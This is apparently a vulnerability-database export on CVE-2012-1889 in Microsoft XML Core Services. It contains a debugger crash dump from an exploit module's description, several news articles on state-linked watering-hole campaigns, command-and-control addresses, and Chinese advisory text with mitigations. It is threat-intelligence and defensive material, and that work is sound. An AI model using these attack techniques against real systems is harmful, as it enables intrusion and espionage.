pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmsxml3!_dispatchImpl::InvokeHelper+0xb4: \n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=???????? \n \n \n0:008> r \neax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528 \neip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmsxml3!_dispatchImpl::InvokeHelper+0xb4: \n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=???????? \n0:008> k \nChildEBP RetAddr \n020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4 \n020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e \n020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa \n020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50 \n020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa \n020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d \n020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8 \n020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a \n020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98 \n020bf590 633a77ff jscript!VAR::InvokeByName+0x135 \n020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a \n020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce \n020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989 \n020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff \n020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f \n020bf958 633891f1 jscript!CSession::Execute+0x175 \n020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0 \n020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a \n020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30 \n020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219 \n \n=end`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113765/msxml_get_definition_code_exec.rb.txt"}], "threatpost": [{"lastseen": "2018-10-06T23:02:12", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "A new APT-style espionage campaign launched this summer targeting organizations tied to financial services, government agencies and the defense industry used a technique dubbed water holing to entice victims and silently redirect them to sites hosting zero-day exploits.\n\nResearchers at RSA Security said this technique is not new (it was previously observed in the [Aurora](<https://threatpost.com/inside-aurora-google-attack-malware-011910/>) and [Ghostnet](<https://threatpost.com/ghostnet-shows-extent-online-spying-033009/>) attacks), but the month-long campaign held in June and July was the first time water holing was observed at any large scale. [Water holing](<http://blogs.rsa.com/will-gragido/lions-at-the-watering-hole-the-voho-affair/>), as described by RSA\u2019s Will Gragido, is an attack on legitimate, geographically or topically connected websites that an attacker believes members of a target organization will visit.\n\nThe latest attack, called [VOHO](<http://blogs.rsa.com/wp-content/uploads/VOHO_WP_FINAL_READY-FOR-Publication-09242012_AC.pdf>) by RSA\u2019s FirstWatch research team, compromised a local government site in Maryland and a regional bank in Massachusetts as well as sites having ties to the promotion of democracy in oppressed regions. RSA described the victims as \u201centities and people that seek to promote democratic government in countries whose existing political structure and power doesn\u2019t support (and indeed persecutes) such governmental change.\u201d\n\nVulnerabilities on those websites were exploited and a new variant of the Gh0st RAT malware was dropped. A host of other sites related to the defense industrial base, education, political activism in the Washington, D.C., and Boston areas were also targeted.\n\nEarlier this month, [Symantec\u2019s Elderwood Project report](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>) also connected the water holing technique to the Aurora hackers. Symantec, however, did not identify the compromised sites, nor the connection between the targets.\n\n\u201cWe believe these websites were likely chosen with exact precision and great consideration; selected from thousands upon thousands of websites due to familiarity and proximity to the targets of interest that the threat actors responsible for the campaign were truly interested in compromising,\u201d the RSA report said.\n\nVisitors to any of those sites were silently redirected to a curling site; RSA redacted the name of the site from its report, but KrebsonSecurity.com reports the site to be torontocurling.com. That site then attempted to exploit a [vulnerability in Microsoft XML Core Services](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889>) or a Java flaw that was zero-day at the time. Once infected, Gh0st RAT would call out to command and control servers at one of two IP addresses: 58.64.155.59 or 58.64.155.57, RSA said. Gh0st RAT has been used in other nation-state attacks, and like other typical botnet malware can log keystrokes, remotely operate embedded webcams or microphones, search local files, run arbitrary code, and download and exfiltrate files.\n\nRSA said the VOHO campaign was carried out in separate phases starting June 25. HTTP logs obtained by FirstWatch observed referral traffic to torontocurling.com, and exploits beginning July 9 against a vulnerability in Internet Explorer. These attacks continued for two days. Phase two began July 16 with exploits of a Java zero-day vulnerability, and ended July 18 when RSA said a server admin at the curling site took the server down for remediation.\n\nOnce a victim landed on one of the watering hole sites and was redirected, a chain of events kicked off in the background where the exploit determines if the visitor is running Windows and Internet Explorer and eventually compromises the browser and drops the Gh0st RAT malware via either a .CAB or .JAR file; RSA said this code was previously used in the 2009 Aurora attacks against Google Gmail accounts.\n\nMore than 32,000 visitors from 731 unique global organizations were redirected to the exploit site; almost 4,000 hosts downloaded exploit files for a 12 percent success rate; RSA said this indicates \u201ca very successful campaign.\u201d The Massachusetts regional bank was the top redirector by far, RSA said, and hosts from corporate networks and consumers suffered the largest number of compromises. Victims from financial services, state and federal government, utilities, defense industrial base and education domains represented a fraction of the compromises.\n\n\u201cAs the political and governmental hub of the United States of America, wholesale compromise of computers in this area would provide a wealth of intelligence for adversaries interested in political process and government action,\u201d RSA said in its report, adding that it is aware of at least 50 unique Gh0st networks. Gh0st source code is freely available online and attackers are able to constantly add new capabilities to the original code base.\n\n\u201cFrom an operational sense, having easy opportunity to modify source code allows a much more robust compromise, with decreased likelihood of attacker detection,\u201d the report said.\n", "modified": "2013-04-17T16:31:29", "published": "2012-09-25T18:08:44", "id": "THREATPOST:49C25ED2BE0FD4019AAA40EBE11EF946", "href": "https://threatpost.com/large-scale-water-holing-attack-campaigns-hitting-key-targets-092512/77045/", "type": "threatpost", "title": "Large-Scale Water Holing Attack Campaigns Hitting Key Targets", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:42", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "Attackers really like exploit kits because they offer users the ease of point-and-click exploitation, lots of potential targets and don\u2019t require a huge amount of technical knowledge to use. Attackers also enjoy Microsoft vulnerabilities, especially unpatched ones, because of the massive installed base, and at least some of the users of the [Black Hole exploit kit](<https://threatpost.com/black-hole-exploit-kit-available-free-052311/>) have begun using the exploit for the [critical MSXML vulnerability](<https://threatpost.com/attackers-targeting-msxml-flaw-malicious-flash-files-062212/>) in their attacks.\n\nThe CVE-2012-1889 vulnerability in the MSXML component in Internet Explorer has been in use by attackers for several weeks now in various scenarios. The first attacks were using malicious Office documents as the delivery mechanism for the exploit code, and they were being launched even before the vulnerability information was public. A second wave of attacks began shortly after the bug data was published, and that series was using malicious Flash files to deliver the exploits.\n\nThere is a module in the Metasploit Framework that can be used to exploit the MSXML vulnerability as well, and researchers say that the attackers behind some versions of Black Hole have been using an exploit that looks a lot like the Metasploit code.\n\n\u201cSure enough, within a week, CVE-2012-1889 exploiting code very similar to that published to Metasploit was seen within the landing page of a Blackhole exploit kit site,\u201d [Sophos researcher Fraser Howard](<http://nakedsecurity.sophos.com/2012/06/29/zero-day-xml-core-services-vulnerability-included-in-blackhole-exploit-kit/>) wrote in a blog post.\n\n\u201cThe code is bundled alongside the various other exploits that Blackhole currently targets. The landing page itself is obfuscated in the usual manner we expect for Blackhole, using the latest anti-emulation tricks in an attempt to thwart detection.\u201d\n\nBlack Hole is a dangerous and widely used exploit kit that is sold on underground sites, much as similar kits such as Phoenix and Eleonor are, and it includes exploits for a variety of vulnerabilities. Which exploits are included can depend upon which version of the kit you buy and from whom you buy it. But once an exploit is available in one version, it could then spread to other versions of Black Hole or other exploit kits altogether.\n\n \n\n", "modified": "2013-04-17T16:31:55", "published": "2012-07-03T15:32:34", "id": "THREATPOST:D260EAACDFFCF67AAA2234048670595E", "href": "https://threatpost.com/msxml-exploit-surfaces-black-hole-kit-070312/76761/", "type": "threatpost", "title": "MSXML Exploit Surfaces in Black Hole Kit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:41", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "A new version of the Sykipot Trojan is being pushed to unsuspecting users in a wave of online attacks, including targeted attacks on attendees of an international aerospace conference, according to researchers at the security firm AlienVault.\n\nThe latest edition of the common Trojan Horse program appeared within the last month and is spreading using e-mail messages containing links to malicious Web sites carry out drive-by download attacks against e-mail recipients who click on the link. The attacks use exploits for recently disclosed security holes, such as [Microsoft\u2019s Windows XML Core Services vulnerability](<CVE-2012-1889%20-%20http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1889>) that was [first disclosed in June](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>). Exploits of that hole were linked to state-sponsored attacks, [which both Google and Microsoft warned about in June](<https://threatpost.com/google-warning-users-about-state-sponsored-attacks-060512/>). \n\nThe shift to drive by downloads is a change. Previous versions of Sykipot have spread mostly by exploiting [file-format exploits](<https://threatpost.com/more-details-sykipot-exploits-adobe-reader-flaw-surface-121211/>) in applications like Microsoft Excel [and Adobe Reader](<https://threatpost.com/attackers-using-known-trojan-exploits-adobe-zero-day-120811/>), according to [a post by Alienvault\u2019s Jaime Blasco, AlienVault\u2019s Labs Manager, on Monday](<http://labs.alienvault.com/labs/index.php/2012/sykipot-is-back/>). The new Sykipot variant also uses a collection of recently registered Web domains to serve up malicious attacks. Most have been registered during the last month and are linked to the same yahoo.com e-mail address, AlienVault disclosed.\n\nIn other respects, however, the malware is the same: exploit kits that serve up the Sykipot Trojan are installed on compromised Web servers, often based in the U.S. Once installed, the Sykipot malware uses SSL (Secure Sockets Layer) to protect its communications with a central command and control (C&amp;C) server from which it downloads a configuration file and uploads data stolen from infected systems.\n\nAt least one of the new domains used by Sykipot has been linked to targeted phishing-email attacks on attendees of the IEEE Aerospace Conference (the International Conference for Aerospace Experts, Academics, Military Personnel, and Industry Leaders), AlienVault said.\n\nIt wouldn\u2019t be the first time Sykipot had been linked to attacks against government and defense industry interests. In January, AlienVault researchers [found a Sykipot variant that were programmed to steal credentials from systems using ActivIdentity\u2019s ActivClient, smart card software used by the U.S. Department of Defense\u2019s Common Access Card (CAC) smart card deployment](<https://threatpost.com/researchers-find-sykipot-trojan-variant-hijacking-dod-smart-cards-011212/>). \n", "modified": "2013-04-17T16:31:55", "published": "2012-07-03T16:03:35", "id": "THREATPOST:5EE4EF2254C7A6E51307B04E267B45F8", "href": "https://threatpost.com/new-version-sykipot-trojan-linked-targeted-attacks-aerospace-industry-070312/76762/", "type": "threatpost", "title": "New Version of Sykipot Trojan Linked To Targeted Attacks On Aerospace Industry", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:44", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611", "CVE-2012-1889"], "description": "A five-year campaign primarily focused on extracting sensitive information from Japanese oil, gas, and electric utilities was outlined by researchers on Tuesday.\n\nReferred to as [Operation Dust Storm](<https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/Op_Dust_Storm_Report.pdf?t=1456276906648>) (.PDF) by researchers at Cylance, the campaign has managed to stay persistent over the years, and especially lately, by using dynamic DNS domains and customized backdoors.\n\nWhile the group has recently narrowed its sights on Japan, it\u2019s also attacked industries in South Korea, the United States, and Europe, the firm claims.\n\nActivity surrounding the campaign really picked up steam in 2015 when a handful of backdoors with hardcoded proxy addresses and credentials surfaced. Researchers traced those addresses back and noticed a slew of corporations across the oil, natural gas, construction, and transportation sector had been compromised.\n\n> New SPEAR research: Extended campaign against Japanese critical infrastructure: <https://t.co/jq8fwhObyQ> [#opduststorm](<https://twitter.com/hashtag/opduststorm?src=hash>) [pic.twitter.com/kG4X6hmJiG](<https://t.co/kG4X6hmJiG>)\n> \n> \u2014 Cylance, Inc. (@cylanceinc) [February 23, 2016](<https://twitter.com/cylanceinc/status/702149003945709568>)\n\nThere was a wave of attacks that year, including a major Japanese automaker in February, and a Japanese subsidiary of a South Korean electric utility and other critical infrastructure outfits in July and October.\n\nThe campaign also began using custom Android backdoors in 2015 \u2013 at first the Trojan forwarded SMS messages, and later in the year, specific files, from infected devices to C&amp;C servers.\n\nLike many groups in the early 2010s, early iterations of the Dust Storm\u2019s activity revolved around zero days in Internet Explorer and Flash.\n\nFor example, in 2011 the attackers used an IE 8 vulnerability to infiltrate networks. They were also seen sending victims spear phishing emails with Word documents rigged with a zero day Flash exploit, CVE-2011-0611. According to Cylance, in 2012 the attackers used the same Flash exploit, coupled with another IE exploit, CVE-2012-1889, to hit victims.\n\nIn addition to the IE and Flash vulnerabilities, the group relied mostly on phishing attacks in its infancy . In 2011 it tried to siphon up Yahoo and Windows Live credentials though domains it set up and later that year capitalized on the Libyan crisis with emails about Muammar Gaddafi it sent to US government and defense targets.\n\nWhile the backdoor dropped through these exploits made headlines years ago, the Cylance claims that reports around the group have mostly dissipated since.\n\nIt was Dust Storm\u2019s foray into duplicitous backdoors and proxies targeting Japanese resources that prompted researchers to investigate it in earnest last year.\n\n\u201cAs the group became more and more focused on Japan, less and less of their tactics and malware appeared in reports or write-ups. The targets identified escalated both in size and in the scope of affected industries,\u201d the report, penned by the firm\u2019s Director of Threat Intelligence Jon Gross, reads.\n\nWhile the Android Trojans only hit victims in Japan and South Korea, Gross acknowledges that the campaign around the attacks was \u201cmassive in comparison to previous operations,\u201d boasting over 200 domains.\n\nOfficials with SPEAR, Cylance\u2019s research division, make a point to say that they don\u2019t believe the Dust Storm attacks are intended to destructive, but that they may be part of a long con, with their goals most likely \u201creconnaissance and long-term espionage.\u201d\n\nWhile the attacks are ongoing, the group, who worked with the Japanese Computer Emergency Response Team (JP-CERT) to investigate the group, claim the reason they published their research was to hopefully stunt the group\u2019s progress.\n\nCylance doesn\u2019t directly attribute any group of individuals to the Dust Storm attacks but does hint that from March 2013 to August 2013 it observed a \u201cremarkable decrease\u201d in the about of malware it was able to gather surrounding the campaign. It acknowledges that Mandiant\u2019s APT 1 report, which was published in February of that year, follows more or less the same timeline, however.\n\nIn that report Mandiant outlined a series of cyber espionage campaigns carried out over the course of several years on a broad palette of victims by a Chinese threat organization, APT1.\n", "modified": "2016-03-03T00:39:24", "published": "2016-02-24T14:11:04", "id": "THREATPOST:684A9363491231773FDB7BA1EBA2B6C0", "href": "https://threatpost.com/five-year-dust-storm-apt-campaign-targets-japanese-critical-infrastructure/116436/", "type": "threatpost", "title": "Five-Year 'Dust Storm' APT Campaign Seen Targeting Japanese Critical Infrastructure", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:46", "bulletinFamily": "info", "cvelist": ["CVE-2012-1875", "CVE-2012-1889", "CVE-2017-11882"], "description": "The unpatched [vulnerability in Internet Explorer\u2019s MSXML](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>) component that Microsoft warned users about earlier this month is being used in attacks that employ malicious Flash files. Researchers say that the attacks are taking the form of drive-by downloads launched from compromised legitimate sites.\n\nThe attack scenario that\u2019s being used is a familiar one. When users visit a legitimate site that\u2019s been compromised, the malicious code injected onto the site exploits the [CVE-2012-1889](<http://technet.microsoft.com/en-us/security/advisory/2719615>) vulnerability in Internet Explorer to install malware on the victim\u2019s machine. It\u2019s the classic drive-by download technique and it has proven to be effective for years, and it\u2019s even more effective when there\u2019s an unpatched flaw such as this available for use.\n\n\u201cJust like the exploit code used against CVE-2012-1875, this exploit also uses an embedded SWF (Flash) file. The SWF file is responsible for performing the heap spray and setting up the shellcode,\u201d Karthikeyan Kasiviswanathan of Symantec wrote in an analysis of the attacks.\n\nWhen Microsoft first warned users about the vulnerability last week, officials said that the bug already was being used in attacks in the wild. Google researchers, who originally found the vulnerability and disclosed it to Microsoft, said that they had seen attacks against the vulnerability that were using malicious Office documents to carry the payload.\n\nThe newer series of attacks is instead using the ever-popular malicious Flash file as a delivery mechanism for the attacker\u2019s shellcode.\n\n\u201cThe exploit also supports multiple versions of Windows and languages. The heap spray and shellcode are customized depending on the combination of the Windows version and languages,\u201d Kasiviswanathan said. \u201cWhen the vulnerability is triggered, the execution is transferred to the shellcode. The shellcode is designed to download an encrypted payload from a URL and save it to the Temporary Internet Files folder.\u201d\n\nIf you\u2019re running Internet Explorer, you should use the [Microsoft FixIt tool](<http://support.microsoft.com/kb/2719615>) for the vulnerability, which is a stop-gap until Microsoft has a full patch available. \n", "modified": "2013-04-17T16:31:59", "published": "2012-06-22T14:03:58", "id": "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "href": "https://threatpost.com/attackers-targeting-msxml-flaw-malicious-flash-files-062212/76726/", "type": "threatpost", "title": "Attackers Targeting MSXML Flaw With Malicious Flash Files", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:18", "bulletinFamily": "info", "cvelist": ["CVE-2012-0779", "CVE-2012-1535", "CVE-2012-1875", "CVE-2012-1889"], "description": "**[](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>)UPDATE**\u2013The same team that attacked [Google in the Aurora campaign](<https://threatpost.com/aurora-attack-malware-components-may-be-four-years-old-012010/>) in 2009 is still active and has been conducting a long-term campaign targeting defense contractors, financial services companies, energy companies, human rights organizations and government agencies using a seemingly inexhaustible supply of zero day vulnerabilities. The crew is using a variety of techniques to go after its targets, most notably compromising legitimate Web sites frequented by employees of the targeted organizations and then delivering exploits for one or more of their stockpiled zero-day bugs, researchers say.\n\nThe team behind these operations appears to be in the top tier of professional attack teams, possessing the ability to do original research to find new vulnerabilities in popular applications such as Adobe Flash and Internet Explorer, and then write exploits for those flaws, as well. Researchers at Symantec have been tracking the group, which they\u2019ve dubbed the Elderwood gang, for some time, and have seen the crew using previously unknown vulnerabilities in rapid succession over the course of the last couple of years in attacks aimed at defense contractors, government agencies and other high-value targets.\n\nThe number of groups doing their own research and finding zero days and then writing exploits for them is virtually impossible to know, given the structure of the cybercrime underground, but it is thought to be a small number relative to the overall population of attackers. That kind of research takes time, money and high-level technical skills that many groups solely interested in stealing money just don\u2019t have.\n\n\u201cIn order to discover these vulnerabilities, a large undertaking would be required by the attackers to thoroughly reverse-engineer the compiled applications. This effort would be substantially reduced if they had access to source code. The vulnerabilities are used as needed, often within close succession of each other if exposure of any of the vulnerabilities is imminent,\u201d Gavin O\u2019Gorman and Geoff McDonald of Symantec wrote in a detailed [analysis of the Elderwood crew\u2019s tactics](<https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf>).\n\n\u201cThe scale of the attacks, in terms of the number of victims and the duration of the attacks, are another indication of the resources available to the attackers. Victims are attacked, not for petty crime or theft, but for the wholesale gathering of intelligence and intellectual property. The resources required to identify and acquire useful information\u2014let alone analyze that information\u2014could only be provided by a large criminal organization, attackers supported by a nation state, or a nation state itself.\u201d\n\nThe researchers said that this group is utilizing one technique, which they call a \u201cwatering hole\u201d attack, that involves waiting for the targets to come to them rather than going after the targeted organizations or employees directly. To accomplish this, the Elderwood gang identifies a Web site that\u2019s frequented by employees of organizations in the sector that they\u2019re targeting, say financial services. They then compromise that site, whether through SQL injection or some other common technique, and plant exploit code on some of the public pages of the site. They then wait for the targeted employees to hit the pages, at which point the exploit fires and ideally (for the attackers) compromises the victim\u2019s machine.\n\nThe idea is roughly the same as a typical drive-by download attack that uses SQL injection as its initial vector to compromise a site, but in this case the attacker is going after a specific site rather than a large volume of vulnerable sites and is looking for a specific subset of victims, as well. Researchers at [RSA Security also analyzed attacks of this kind](<http://blogs.rsa.com/will-gragido/lions-at-the-watering-hole-the-voho-affair/>) in July, and found that the attackers were installing a variant of Gh0stRAT, a well-known remote-access tool that\u2019s been used in targeted [attacks by Chinese groups](<https://threatpost.com/ghostnet-shows-extent-online-spying-033009/>) for several years.\n\nJoe Stewart, director of malware research at Dell SecureWorks, has been following a series of attacks by groups loosely connected to the crew that Symantec is identifying as the Elderwood gang and said that there\u2019s no question about the group\u2019s capabilities.\n\n\u201cThey\u2019re definitely doing their own research, or paying someone for immediate access to it. They certainly have plenty of zero days they\u2019ve come out with,\u201d Stewart said. \n\nThis Elderwood group has used a number of zero days in the last couple of years as part of its attack campaigns, including the [CVE-2012-1535 Flash vulnerability](<https://threatpost.com/adobe-patches-critical-flash-bug-releases-massive-reader-update-081412/>) that Adobe patched last month and the [CVE-2012-1875 MSXML flaw](<https://threatpost.com/exploit-code-surfaces-cve-2012-1875-internet-explorer-bug-061812/>) in Internet Explorer that Microsoft fixed in June. The group will use exploits for these vulnerabilities both in Web-based attacks and in targeted spear-phishing email attacks. But in both cases, the goal is the theft of intellectual property.\n\n\u201cAlthough watering hole attacks have been known about since approximately March of 2011, the activity outlined in this report marks a substantial increase. Three zero-day exploits, CVE-2012-0779, CVE-2012-1875, and CVE-2012-1889 have all been used within a 30-day period to serve up back door Trojans from compromised websites,\u201d the paper says.\n\nThe connection to the attack on Google in late 2009, which was named Aurora at the time, comes both from some commonalities in the way that the attackers are obfuscating parts of their code, which also was seen in the Hydraq Trojan, the piece of malware used in the Google attack. \n\n\u201cWe believe the Hydraq attack and the recent attacks that exploit the vulnerabilities outlined above are linked,\u201d O\u2019Gorman and McDonald wrote.\n\n\u201cAdditional links joining the various exploits together included a shared command-and-control infrastructure. Trojans dropped by different exploits were connecting to the same servers to retrieve commands from the attackers. Some compromised websites used in the watering hole attacks had two different exploits injected into them one after the other. Yet another connection is the use of similar encryption in documents and malicious executables. A technique used to pass data to a SWF file was re-used in multiple attacks. Finally, the same family of Trojan was dropped from multiple different exploits,\u201d the researchers said.\n\nThe Elderwood team may have a custom platform set up to help take exploit code for a new vulnerability, drop it into a benign Word document or PDF and then bundle it with the Trojan payload to have the components for a new attack at hand as quickly as possible. The crew also has created a SWF file that is used in multiple attacks, with small changes, to help place their exploit code in the optimal part of memory.\n\n\u201cInstead of developing code to perform these tasks for each different exploit, the attackers have developed a common SWF file that is used solely to create the correct conditions in memory and accepts a parameter specifying where to download the Trojan. In some attacks, the parameter name was \u201cElderwood.\u201d The same SWF file was seen used when exploiting 3 different vulnerabilities (CVE-2012-0779, CVE-2012-1875, CVE-2012-1889). By using a common SWF file, the attackers can simply deploy a new trigger, that is, a zero-day exploit, and the SWF handles the rest of the work, retrieving and decoding the back door Trojan,\u201d the researchers said.\n\nThe Elderwood team also seems to have an uncanny ability to sense when one of the zero days it has been using is about to be disclosed publicly. It often will shift to using a new vulnerability shortly before one of its current favorites is exposed, suggesting the crew watches the developments in the underground and legitimate security communities closely.\n\n\u201cThe group seemingly has an unlimited supply of zero-day vulnerabilities. The vulnerabilities are used as needed, often within close succession of each other if exposure of the currently used vulnerability is imminent,\u201d Symantec\u2019s report says.\n\nStewart of Dell SecureWorks said that he hasn\u2019t seen the groups he follows droppng a specific exploit because a vulnerability is about to be patched. But he said the Elderwood gang likely is part of one of the two main attack groups based in China, with this one centered in Beijing and another based around Shanghai.\n\n\u201cThey\u2019re one of the two main actor groups we see and we base that assessment on the sharing of infrastructure and where it\u2019s located and some other details,\u201d he said. \u201cThe reason they use so many different types of malware is that they probably have people inside the groups that have certain preferences, things they like and they\u2019re comfortable with. They use Gh0st, Hydraq, whatever they need. They have a lot of malware. It speaks to a large number of actors. They\u2019re all getting marching orders from the same place, but it\u2019s not the exact same people hitting the keys.\u201d\n\nThis larger group of attackers has been active for years, well before the attack on Google became public in early 2010.\n\n\u201cThey were active well before [the Google attack]. I have samples from them from the 2006 to 2007 time frame and some that are similar and probably them as far back as 2003,\u201d Stewart said. \n\n\u201cThis is years of constant, dedicated, persistent attacks.\u201d\n\n_This story was updated on Sept. 7 to add comments from Joe Stewart._\n", "modified": "2013-04-17T16:31:36", "published": "2012-09-07T14:41:30", "id": "THREATPOST:8118BE47AC766B8F6DD708B119E33DFE", "href": "https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/76987/", "type": "threatpost", "title": "'Elderwood' Crew, Tied to Google Aurora Attack, Targeting Defense, Energy, Finance Companies", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:52:00", "description": "CVE ID: CVE-2012-1889\r\n\r\nMicrosoft XML Core Services (MSXML)\u662f\u4e00\u7ec4\u670d\u52a1\uff0c\u53ef\u7528JScript\u3001VBScript\u3001Microsoft\u5f00\u53d1\u5de5\u5177\u7f16\u5199\u7684\u5e94\u7528\u6784\u5efa\u57fa\u4e8eXML\u7684Windows-native\u5e94\u7528\u3002\r\n\r\nMicrosoft XML Core Services 3.0\u30014.0\u30015.0\u30016.0\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u53ef\u80fd\u5bfc\u81f4\u8bbf\u95ee\u672a\u521d\u59cb\u5316\u5185\u5b58\u5bf9\u8c61\u8fdb\u800c\u53d1\u751f\u5185\u5b58\u7834\u574f\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5728\u7528\u6237\u901a\u8fc7IE\u67e5\u770b\u6076\u610f\u7f51\u9875\u65f6\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nMicrosoft XML Core Services 6.0\r\nMicrosoft XML Core Services 5.0\r\nMicrosoft XML Core Services 4.0\r\nMicrosoft XML Core Services 3.0\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n*\u90e8\u7f72Enhanced Mitigation Experience Toolkit(EMET)\r\n\r\n*\u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u5728IE\u548c\u672c\u5730\u7f51\u7edc\u5b89\u5168\u533a\u57df\u4e2d\u7981\u7528\u6d3b\u52a8\u811a\u672c\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff082719615\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\n2719615\uff1aVulnerability in Microsoft XML Core Services Could Allow Remote Code Execution\r\n\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/en-us/security/advisory/2719615", "published": "2012-06-13T00:00:00", "type": "seebug", "title": "Microsoft XML Core Services\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2012-06-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60204", "id": "SSV:60204", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:50:53", "description": "CVE ID: CVE-2012-1889\r\n\r\nMicrosoft XML\u6838\u5fc3\u670d\u52a1\uff08MSXML\uff09\u5141\u8bb8\u4f7f\u7528JScript\u3001VBScript\u548cMicrosoft Visual Studio 6.0\u7684\u7528\u6237\u6784\u5efa\u53ef\u4e0e\u5176\u4ed6\u7b26\u5408XML 1.0\u6807\u51c6\u7684\u5e94\u7528\u7a0b\u5e8f\u76f8\u4e92\u64cd\u4f5c\u7684XML\u5e94\u7528\u3002\r\n\r\nMicrosoft XML Core Services 3.0\u30014.0\u30015.0\u30016.0\u5728\u8bbf\u95ee\u672a\u521d\u59cb\u5316\u5185\u5b58\u4f4d\u7f6e\u65f6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u53ef\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u7279\u5236\u7684\u7f51\u7ad9\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\n0\nMicrosoft 